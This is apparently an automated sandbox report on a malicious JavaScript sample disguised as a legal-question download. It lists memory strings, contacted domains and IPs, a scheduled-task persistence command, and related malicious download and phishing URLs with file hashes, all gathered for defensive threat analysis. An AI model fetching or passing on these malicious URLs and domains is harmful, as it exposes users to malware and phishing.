                                                            https://github.com/mozilla/source-map/pull/31wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                              		high
                                                              http://jsperf.com/call-apply-seguwscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                		high
                                                                https://github.com/feross/buffer/issues/154wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                  		high
                                                                  https://feross.orgwscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                    		high
                                                                    http://ecmanaut.blogspot.ca/2006/07/encoding-decoding-utf8-in-javascript.htmlwscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://code.google.com/p/chromium/issues/detail?id=25916wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                      		high
                                                                      https://docs.google.com/document/d/1U1RGAehQwRypUTovF1KRlpiOFze0b-_2gc6fAH0KY0k/edit?pli=1#wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                        		high
                                                                        http://html5sec.org/#133.wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://mathiasbynens.be/notes/unquoted-attribute-valueswscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                          		high
                                                                          https://bugzilla.mozilla.org/show_bug.cgi?id=885597.wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                            		high
                                                                            https://github.com/jonschlinkert/is-plain-objectwscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                              		high
                                                                              http://foo.comwscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://github.com/beatgammit/base64-js/issues/42wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                                		high
                                                                                https://code.google.com/p/closure-compiler/source/browse/trunk/src/com/google/debugging/sourcemap/Bawscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                                  		high
                                                                                  https://html.spec.whatwg.org/multipage/syntax.html#optional-tagswscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                                    		high
                                                                                    https://kangax.github.io/html-minifier/)wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://docs.google.com/document/d/1U1RGAehQwRypUTovF1KRlpiOFze0b-_2gc6fAH0KY0k/edit#heading=h.535eswscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                                      		high
                                                                                      https://github.com/feross/buffer/issues/166wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        50.116.62.225
                                                                                        		rainmeter-skins.comUnited States
                                                                                        		63949LINODE-APLinodeLLCUSfalse
                                                                                        172.67.208.58
                                                                                        		crackedroom.comUnited States
                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                        46.38.249.148
                                                                                        		www.xn--operation-wstenfuchs-zec.deGermany
                                                                                        		197540NETCUP-ASnetcupGmbHDEfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                        Analysis ID:1436973
                                                                                        Start date and time:2024-05-06 20:40:25 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 6m 30s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:12
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:does virginia have a no chase law for motorcycles 62848.js
                                                                                        Detection:MAL
                                                                                        Classification:mal68.expl.evad.winJS@13/9@3/3
                                                                                        EGA Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 0
                                                                                        • Number of non-executed functions: 0
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .js

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        20:42:09Task SchedulerRun new task: C-Level Leadership path: wscript s>SOCIOL~1.JS
                                                                                        20:42:44API Interceptor197x Sleep call for process: powershell.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        No context

                                                                                        Domains

                                                                                        No context

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        NETCUP-ASnetcupGmbHDEhttp://92.60.39.76:9993/wr.exeGet hashmaliciousXmrigBrowse
                                                                                        • 92.60.39.76
                                                                                        http://92.60.39.76:9993/wr.exeGet hashmaliciousUnknownBrowse
                                                                                        • 92.60.39.76
                                                                                        http://92.60.39.76:9993/wr.exeGet hashmaliciousXmrigBrowse
                                                                                        • 92.60.39.76
                                                                                        c8sDO7umrx.exeGet hashmaliciousCMSBruteBrowse
                                                                                        • 92.60.37.105
                                                                                        benign.exeGet hashmaliciousMetasploitBrowse
                                                                                        • 5.45.103.44
                                                                                        RDFchOT4i0.exeGet hashmaliciousUnknownBrowse
                                                                                        • 93.177.67.178
                                                                                        PHHOjspjmp.exeGet hashmaliciousCMSBruteBrowse
                                                                                        • 188.68.53.92
                                                                                        b3astmode.x86.elfGet hashmaliciousUnknownBrowse
                                                                                        • 193.30.120.120
                                                                                        77system.vbsGet hashmaliciousXmrigBrowse
                                                                                        • 94.16.123.97
                                                                                        LINODE-APLinodeLLCUSPAYROLL.docGet hashmaliciousFormBookBrowse
                                                                                        • 45.33.6.223
                                                                                        Arrival Notice.docGet hashmaliciousFormBookBrowse
                                                                                        • 45.33.6.223
                                                                                        http://www.paviarealestate.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 66.228.43.205
                                                                                        MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                                        • 45.33.6.223
                                                                                        EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                        • 45.33.6.223
                                                                                        SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                                                        • 45.33.97.245
                                                                                        SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                                                        • 45.33.97.245
                                                                                        https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                        • 45.56.122.121
                                                                                        https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 45.56.122.121
                                                                                        https://cushwake.radiacellar.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.237.130.23
                                                                                        CLOUDFLARENETUSSecuriteInfo.com.Win32.PWSX-gen.15690.18210.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.19.24
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.7218.26841.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.19.24
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.11682.16133.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.19.24
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.3887.15319.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.19.24
                                                                                        https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/66356e24c5673e2fac17e607/66356e3e4f05433e20881ae5?signature=683e1cd72e9bdfa6f1fdbb083e5471f574a7bc5e3f602f73e97e33d55ee8c1d6Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                        • 172.67.222.81
                                                                                        file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                        • 104.26.5.15
                                                                                        http://url2702.birdlinesurvey.com/ls/click?upn=u001.fvR7TaIBWduFhQsheFn3aEaPhK8uODx4FECc3zInjq9BSAf6gBrj2-2BedXmzSOWcd7vxp_lhEpvcamcm95WhC017PRgUW5-2FexFmUztzt-2BcKquNxQ1YN72CKbQQSny2VeQqNZrhBFTOEqx-2F39TrKU7BM5IdEMb8Ff5ZieEcgOxfUarcqJlesyk2zJY-2BwChBwanXRRguoubpfSPqJUGeBH-2BzQeyYA0nqbzb6SKnXlWMM81gllISMtxtUwBSKbkxJz93WcSM4hTla0Kc1ku7W5WS7mebxSuTWlLTTC-2FhqXapGO2vZ08oTfJZVndvi6I-2BSnihO3dZsSJgENxwP5ZhoejGfPPs1Na-2FVC2UyFhZFyHjm0X4TH2XjgB8AYX07PdLxDOeoeWyiOnumIU4-2B-2FgJov9FyGEDMwPThdsm2z08qXDtfdx0QY6k32zVGOZMjxPkju1pYu-2B-2BIuSn1OLU8E2ck-2ByrYb4gXHvkd08o-2FHpdsvgFBnmLtYDeKd7vxr1IhtyjP-2F7suT-2BOfLMWrgiPDFhYVGGNB34EPhojLkUDKyEX35z0JUhT-2FSaPoSfbYVLUvzNDpg8UZ48DeSGARh29mUxJgFc3uzTCxyTF0Fpnvt7ZJKajvB7kNsGeaoRFHFpUHzNVsrYK1-2F1wGrAVj4ZEp-2FG58qkwpBzPAruseXEAU6-2B6hEfYNMONrNvIY3vz2ha-2Buhz-2B1j3r-2BlhJV3MJvwCHsnDS-2BEQb3ae9OABVw0ZkVBjYVDB8BpSYCBmu3oAOjJJvgg9foyeOeKFSaqitIV8XTM2RDg8SEHJb5Q5pucXuEGbqophNoPNxxiUg1BeM9YM9XQ9Q8TMcWw37s3qSJtDR9CV6L0GplPi-2Bq6Z9-2FD8pF7r-2BPjSP9fvF9bsB0rEgBa7-2BFpP02oFrZA82EmV0vtJFdb5DlGrcdYINE3Rc0UBEelzIaogt1DDEMdOA-3DGet hashmaliciousUnknownBrowse
                                                                                        • 162.159.137.9
                                                                                        http://email.panatech.io/c/eJykzbFuwyAQgOGnwVstOExiDwypIqaqa6pux3EppAZbmFRKn76K_Ajd_uXTH-x1UHBQHVt1VEZKMFJ10QL5idF4CqO-TmoMo2YmDBTkZMirLlktCaQxR5g4sISBWaNUo4HDQaM-ghjkigUbU-zT0s02trZuQp8EOAEu1p5pKUtO1FLmrU8lJNyTlizAcZv7Na5Cu3udhT7_1-8u3DJmbJjvWyKPBSs-rQBHX_nJENzj82JOlNXv2-X9x3-8Rp_nmR7m5kEKfe6q_cbKRQyy5u2FlrxiSfv3LwAA__9Tq2zKGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.2.184
                                                                                        http://www.ismg.com.mx/Get hashmaliciousUnknownBrowse
                                                                                        • 172.67.185.53
                                                                                        Scanned_From_Microsoft-365-Ms Jennifer Ferrier Chief Financial Officer payment remittance.HTMLGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 1.1.1.1

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.PWSX-gen.15690.18210.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.208.58
                                                                                        • 46.38.249.148
                                                                                        • 50.116.62.225
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.7218.26841.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.208.58
                                                                                        • 46.38.249.148
                                                                                        • 50.116.62.225
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.11682.16133.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.208.58
                                                                                        • 46.38.249.148
                                                                                        • 50.116.62.225
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.3887.15319.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.208.58
                                                                                        • 46.38.249.148
                                                                                        • 50.116.62.225
                                                                                        real estate co ownership agreement template 43632.jsGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.208.58
                                                                                        • 46.38.249.148
                                                                                        • 50.116.62.225
                                                                                        TS-240506-UF2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 172.67.208.58
                                                                                        • 46.38.249.148
                                                                                        • 50.116.62.225
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.32248.12145.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.208.58
                                                                                        • 46.38.249.148
                                                                                        • 50.116.62.225
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.6752.20282.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.208.58
                                                                                        • 46.38.249.148
                                                                                        • 50.116.62.225
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.30686.12876.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.208.58
                                                                                        • 46.38.249.148
                                                                                        • 50.116.62.225
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.10655.13246.exeGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.208.58
                                                                                        • 46.38.249.148
                                                                                        • 50.116.62.225

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):19604
                                                                                        Entropy (8bit):5.00909775372993
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:qVib49PVoGIpN6KQkj2kkjh4iUxGhQedzxAYv3OdB0NXp52qYo8YKib4o:qFPV3IpNBQkj2Nh4iUxGhddzxAYv3OdM
                                                                                        MD5:9B2D99EB4D23180F11A08DDFC55867E8
                                                                                        SHA1:16B93762DB77ABA65A39D4CDD1AE24A894355485
                                                                                        SHA-256:D8CD2915E82A88C3A4F2E164F04B610C090E9BA4E6A578F831F0527B7FD63207
                                                                                        SHA-512:D376E1E8E22C87C0B86019BEA3E48153BCD78D6C4C79864772E13A25E28BF60F2112C317638729159CB4903F167A2EA2F820C939BB2B93AAF2F4143035DE1209
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2a11dyd5.5wg.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i43wmqo3.ghm.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ld2qu5ph.zbt.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj4nk4sf.ocj.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uniq3ufq.nga.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
